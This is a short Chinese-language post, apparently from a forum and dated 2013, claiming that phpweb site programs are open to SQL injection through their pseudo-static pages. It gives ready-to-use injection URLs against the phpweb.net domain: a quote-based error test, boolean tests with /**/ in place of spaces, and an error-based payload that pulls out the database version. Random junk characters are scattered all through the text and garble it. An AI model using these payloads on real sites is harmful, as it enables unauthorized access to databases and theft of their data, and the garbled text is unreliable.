phpweb所有的整站程序伪静态页面都存在sql注入7 V; I. ~) m' ?! |/ u8 C* q
( H3 Q, g, y& m9 p7 c* J0 }
主站:http://phpweb.net/7 z% B) E7 \2 X% Y
加’检测:
8 W: z& b, v0 B( Z( R- u* @8 Z
4 l) {+ t1 G* Y5 O. vhttp://www.phpweb.net/down/html/?772′.html5 T$ K3 N* g, B, C
, d6 d9 c7 R7 j出错- a N/ K& a& d. e- A
存在注入。
+ n8 A! d4 D0 O6 }不能用空格,只能用/*罗
- r( n1 ~$ L: ?+ c) I! xhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
4 B* A! q( I3 L& u% @6 X( V 5 X5 S% B- l( N; y a$ u
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
* T/ |# u6 q8 Z* V: M/ H爆数据库版本:
- Y! f0 O9 m# F* W( n% _; Z' G' `
l/ d9 D3 p8 `9 \?* B. S0 Y1 d/ g D& B8 T4 }# V
1
h+ D/ o( @/ D! `) phttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
6 j3 ~5 T4 j* Y5 R更新日期: 2013-01-03 13:39:50 ; j5 M1 f. Q! N% L# U
|